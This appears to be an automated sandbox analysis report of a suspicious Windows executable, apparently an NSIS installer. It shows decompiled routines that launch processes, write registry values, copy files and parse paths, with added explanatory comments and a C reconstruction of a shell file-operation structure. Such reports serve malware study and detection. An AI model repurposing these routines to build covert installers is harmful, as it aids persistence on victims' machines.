                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                        • Instruction ID: 390733356b0797d34322a861430c44886bb095c9ae44ddfd4580086c5e9a0f80
                                        • Opcode Fuzzy Hash: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
                                        • Instruction Fuzzy Hash: 7E219071A44209BFEF119FB0CD4AAAD7FB1EF44304F10443AF501BA1E1D7798A419B18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 83%
                                        			E00401E9C() {
                                        				void* _t15;
                                        				void* _t24;
                                        				void* _t26;
                                        				void* _t31;
                                        
                                        				_t28 = E00402A9A(_t24);
                                        				E00404D62(0xffffffeb, _t13);
                                        				_t15 = E00405247(_t28, "C:\\Users\\jones\\AppData\\Local\\Temp");
                                        				 *(_t31 + 8) = _t15;
                                        				if(_t15 == _t24) {
                                        					 *((intOrPtr*)(_t31 - 4)) = 1;
                                        				} else {
                                        					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                        						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                        							E00405CFC(0xf);
                                        						}
                                        						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x34);
                                        						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                        							if( *(_t31 - 0x34) != _t24) {
                                        								 *((intOrPtr*)(_t31 - 4)) = 1;
                                        							}
                                        						} else {
                                        							E0040591D(_t26,  *(_t31 - 0x34));
                                        						}
                                        					}
                                        					_push( *(_t31 + 8));
                                        					CloseHandle();
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t31 - 4));
                                        				return 0;
                                        			}
                                        0x00401ea2
                                        0x00401ea7
                                        0x00401eb2
                                        0x00401eb9
                                        0x00401ebc
                                        0x004026da
                                        0x00401ec2
                                        0x00401ec5
                                        0x00401ed6
                                        0x00401ed1
                                        0x00401ed1
                                        0x00401eeb
                                        0x00401ef4
                                        0x00401f04
                                        0x00401f06
                                        0x00401f06
                                        0x00401ef6
                                        0x00401efa
                                        0x00401efa
                                        0x00401ef4
                                        0x00401f0d
                                        0x00401f10
                                        0x00401f10
                                        0x00402932
                                        0x0040293e

                                        APIs
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                          • Part of subcall function 00405247: GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                          • Part of subcall function 00405247: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                          • Part of subcall function 00405247: CloseHandle.KERNEL32(?), ref: 00405290
                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
                                        • GetExitCodeProcess.KERNEL32 ref: 00401EEB
                                        • CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 4003922372-47812868
                                        • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                        • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                        • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                        • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405247(CHAR* _a4, CHAR* _a8) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				signed char _t10;
                                        				int _t12;
                                        
                                        				0x7a1588->cb = 0x44;
                                        				_t10 = GetFileAttributesA(_a8);
                                        				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                        					_a8 = 0;
                                        				}
                                        				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                        				if(_t12 != 0) {
                                        					CloseHandle(_v20.hThread);
                                        					return _v20.hProcess;
                                        				}
                                        				return _t12;
                                        			}
                                        0x00405250
                                        0x0040525a
                                        0x00405265
                                        0x0040526b
                                        0x0040526b
                                        0x00405283
                                        0x0040528b
                                        0x00405290
                                        0x00000000
                                        0x00405296
                                        0x0040529a

                                        APIs
                                        • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                        • CloseHandle.KERNEL32(?), ref: 00405290
                                        Strings
                                        • Error launching installer, xrefs: 00405247
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: AttributesCloseCreateFileHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 2000254098-66219284
                                        • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                        • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                        • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                        • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004054CC(CHAR* _a4) {
                                        				CHAR* _t7;
                                        
                                        				_t7 = _a4;
                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                        					lstrcatA(_t7, 0x409010);
                                        				}
                                        				return _t7;
                                        			}
                                        0x004054cd
                                        0x004054e4
                                        0x004054ec
                                        0x004054ec
                                        0x004054f4

                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                        • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                        • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                        • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                        • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E00402386(void* __eax, void* __eflags) {
                                        				void* _t15;
                                        				char* _t18;
                                        				int _t19;
                                        				char _t24;
                                        				int _t27;
                                        				intOrPtr _t33;
                                        				void* _t35;
                                        
                                        				_t15 = E00402B61(__eax);
                                        				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                        				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                        				 *(_t35 - 0x44) = E00402A9A(2);
                                        				_t18 = E00402A9A(0x11);
                                        				 *(_t35 - 4) = 1;
                                        				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                        				if(_t19 == 0) {
                                        					if(_t33 == 1) {
                                        						E00402A9A(0x23);
                                        						_t19 = lstrlenA(0x40a418) + 1;
                                        					}
                                        					if(_t33 == 4) {
                                        						_t24 = E00402A7D(3);
                                        						 *0x40a418 = _t24;
                                        						_t19 = _t33;
                                        					}
                                        					if(_t33 == 3) {
                                        						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                        					}
                                        					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                        						 *(_t35 - 4) = _t27;
                                        					}
                                        					_push( *(_t35 + 8));
                                        					RegCloseKey();
                                        				}
                                        				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                        				return 0;
                                        			}
                                        0x00402387
                                        0x0040238c
                                        0x00402396
                                        0x004023a0
                                        0x004023a3
                                        0x004023b5
                                        0x004023bc
                                        0x004023c4
                                        0x004023d2
                                        0x004023d6
                                        0x004023e1
                                        0x004023e1
                                        0x004023e5
                                        0x004023e9
                                        0x004023ef
                                        0x004023f4
                                        0x004023f4
                                        0x004023f8
                                        0x00402404
                                        0x00402404
                                        0x0040241d
                                        0x0040241f
                                        0x0040241f
                                        0x00402422
                                        0x004024fb
                                        0x004024fb
                                        0x00402932
                                        0x0040293e

                                        APIs
                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                        • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                        • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CloseCreateValuelstrlen
                                        • String ID:
                                        • API String ID: 1356686001-0
                                        • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                        • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                        • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                        • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                         			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                         				char* _t21;
                                         				int _t22;
                                         				void* _t33;
                                         
                                         				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                         				_t21 = E00402A9A(0xffffffee); // resolve the string operand (the file name to query)
                                         				 *(_t33 - 0x2c) = _t21;
                                         				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30); // size of the file's version resource, 0 if none
                                         				 *__esi = __ebx;
                                         				 *(_t33 - 8) = _t22;
                                         				 *__edi = __ebx; // both output strings start empty (__ebx is 0 in this routine)
                                         				 *((intOrPtr*)(_t33 - 4)) = 1; // error flag, cleared only on success
                                         				if(_t22 != __ebx) {
                                         					__eax = GlobalAlloc(0x40, __eax); // 0x40 = GMEM_ZEROINIT (GPTR): buffer for the version block
                                         					 *(__ebp - 0x34) = __eax;
                                         					if(__eax != __ebx) {
                                         						if(__eax != 0) { // return value of GetFileVersionInfoA at 0x401F97 (listed under APIs below), elided by the decompiler
                                         							__ebp - 0x44 = __ebp + 8; // decompiler artifact: the two out-parameters of the call below
                                         							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                         								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8))); // offset 8 of the returned block (dwFileVersionMS when the sub-block at 0x409010 is the root VS_FIXEDFILEINFO), formatted via wsprintfA
                                         								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc))); // offset 0xC (dwFileVersionLS)
                                         								 *((intOrPtr*)(__ebp - 4)) = __ebx; // success: clear the error flag
                                         							}
                                         						}
                                         						_push( *(__ebp - 0x34));
                                         						GlobalFree();
                                         					}
                                         				}
                                         				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4)); // accumulate the error flag into the global at 0x7a3008
                                         				return 0;
                                         			}

                                        APIs
                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 1404258612-0
                                        • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                        • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                        • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                        • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E004021F6() {
                                        				void* __ebx;
                                        				char _t33;
                                        				CHAR* _t35;
                                        				CHAR* _t38;
                                        				void* _t40;
                                        
                                         				_t35 = E00402A9A(_t33); // source path operand
                                         				 *(_t40 + 8) = _t35;
                                         				_t38 = E00402A9A(0x11); // destination path operand
                                         				 *(_t40 - 0x64) =  *(_t40 - 8); // SHFILEOPSTRUCTA starts at _t40 - 0x64: hwnd
                                         				 *((intOrPtr*)(_t40 - 0x60)) = 2; // wFunc = FO_COPY
                                         				( &(_t35[1]))[lstrlenA(_t35)] = _t33; // write a second NUL: pFrom must be a double-NUL-terminated list
                                         				( &(_t38[1]))[lstrlenA(_t38)] = _t33; // same for pTo
                                         				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8); // format a status string into the static buffer at 0x40a418
                                         				lstrcatA(0x40a418, _t38); // ... and append the destination path
                                         				 *(_t40 - 0x5c) =  *(_t40 + 8); // pFrom
                                         				 *(_t40 - 0x58) = _t38; // pTo
                                         				 *(_t40 - 0x4a) = 0x40a418; // lpszProgressTitle (struct offset 0x1a: the 32-bit declaration is 1-byte packed)
                                         				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c)); // fFlags
                                         				E00404D62(_t33, 0x40a418); // log the status text (SetWindowTextA / SendMessageA, see APIs below)
                                         				if(SHFileOperationA(_t40 - 0x64) != 0) { // nonzero return: the copy failed
                                         					E00404D62(0xfffffff9, _t33); // log the failure message
                                         					 *((intOrPtr*)(_t40 - 4)) = 1; // set the error flag
                                         				}
                                         				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4)); // accumulate the error flag into the global at 0x7a3008
                                         				return 0;
                                         			}

                                        APIs
                                        • lstrlenA.KERNEL32 ref: 00402218
                                        • lstrlenA.KERNEL32(00000000), ref: 00402222
                                        • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078E938,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078E938,00789938), ref: 00404DBE
                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                        • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                        • String ID:
                                        • API String ID: 3674637002-0
                                        • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                        • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                        • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                        • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                        Uniqueness

                                        Uniqueness Score: -1.00%
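Two things in E004021F6 above are easy to misread in decompiler form: the SHFILEOPSTRUCTA it fills in from _t40-0x64 downwards, and the stores of a second NUL past each string's terminator. The following is an added example, not code from the page or from the sample, that reconstructs both in portable C. The layout follows the packed 32-bit shellapi.h declaration, with pointers and handles modelled as uint32_t so the offsets match the sample's 32-bit frame on any host; build_file_list and count_file_list are hypothetical helpers, and the file names used to exercise them are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example: a host-independent model of the 32-bit SHFILEOPSTRUCTA.
 * shellapi.h declares the x86 version 1-byte packed, which is why the
 * decompiled code stores lpszProgressTitle at _t40 - 0x4a (offset 0x1a)
 * and not at the 4-byte-aligned -0x48. Pointer/handle fields are
 * uint32_t here purely to reproduce the 32-bit offsets. */
#pragma pack(push, 1)
typedef struct {
    uint32_t hwnd;                  /* _t40 - 0x64 */
    uint32_t wFunc;                 /* _t40 - 0x60 : 2 == FO_COPY */
    uint32_t pFrom;                 /* _t40 - 0x5c */
    uint32_t pTo;                   /* _t40 - 0x58 */
    uint16_t fFlags;                /* _t40 - 0x54 */
    uint32_t fAnyOperationsAborted; /* _t40 - 0x52 */
    uint32_t hNameMappings;         /* _t40 - 0x4e */
    uint32_t lpszProgressTitle;     /* _t40 - 0x4a : the "status + destination" text */
} shfileopstruct32_t;
#pragma pack(pop)

/* Build the double-NUL-terminated list ("a\0b\0\0") that pFrom and pTo
 * require. The sample achieves the same for a single name with
 * s[lstrlenA(s) + 1] = 0. Returns the bytes written, or 0 if out is too
 * small to hold every entry plus the final extra NUL. */
size_t build_file_list(const char *const *items, size_t n, char *out, size_t cap)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        size_t len = strlen(items[i]) + 1;      /* entry including its NUL */
        if (used + len + 1 > cap)               /* +1 reserves the second terminator */
            return 0;
        memcpy(out + used, items[i], len);
        used += len;
    }
    out[used++] = '\0';                         /* the second terminator */
    return used;
}

/* Count entries in a double-NUL-terminated list. A list missing the second
 * NUL would make this walk (and SHFileOperation) read past the last name. */
size_t count_file_list(const char *list)
{
    size_t n = 0;
    while (*list) {
        n++;
        list += strlen(list) + 1;
    }
    return n;
}
```

The offset checks are the useful part when reading decompiler output: subtracting a stack slot from the struct base (-0x64) gives the field offset, and the 0x1a result only makes sense once you know the 32-bit struct is packed.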

                                        C-Code - Quality: 100%
                                        			E0040555F(CHAR* _a4) {
                                        				CHAR* _t3;
                                        				char* _t5;
                                        				CHAR* _t7;
                                        				CHAR* _t8;
                                        				void* _t10;
                                        
                                         				_t8 = _a4;
                                         				_t7 = CharNextA(_t8); // DBCS-aware step: _t7 -> path[1]
                                         				_t3 = CharNextA(_t7); // _t3 -> path[2]
                                         				if( *_t8 == 0 ||  *_t7 != 0x5c3a) { // 0x5c3a is ":\" read as a little-endian WORD at path[1]
                                         					if( *_t8 != 0x5c5c) { // 0x5c5c is "\\": not a UNC path either
                                         						L8:
                                         						return 0; // no recognised root
                                         					}
                                         					_t10 = 2; // UNC: skip "\\server\" and then "share\"
                                         					while(1) {
                                         						_t10 = _t10 - 1;
                                         						_t5 = E004054F7(_t3, 0x5c); // used as a find-char for '\': the caller treats a pointer to NUL as "not found"
                                         						if( *_t5 == 0) {
                                         							goto L8; // server or share name without a trailing '\'
                                         						}
                                         						_t3 = _t5 + 1;
                                         						if(_t10 != 0) {
                                         							continue;
                                         						}
                                         						return _t3; // points just past "\\server\share\"
                                         					}
                                         					goto L8;
                                         				} else {
                                         					return CharNextA(_t3); // drive root "X:\": return path + 3
                                         				}
                                        			}

                                        APIs
                                        • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\Y4U48592345670954.exe" ,00000000), ref: 0040556D
                                        • CharNextA.USER32(00000000), ref: 00405572
                                        • CharNextA.USER32(00000000), ref: 00405581
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.659735027.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.659730193.0000000000400000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659743186.0000000000407000.00000002.00020000.sdmp
                                         • Associated: 00000000.00000002.659748114.0000000000409000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659776503.000000000077A000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659782214.0000000000784000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659797642.0000000000795000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659806462.00000000007A1000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659810633.00000000007A9000.00000004.00020000.sdmp
                                         • Associated: 00000000.00000002.659815624.00000000007AC000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3213498283-3081826266
                                        • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                        • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                        • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
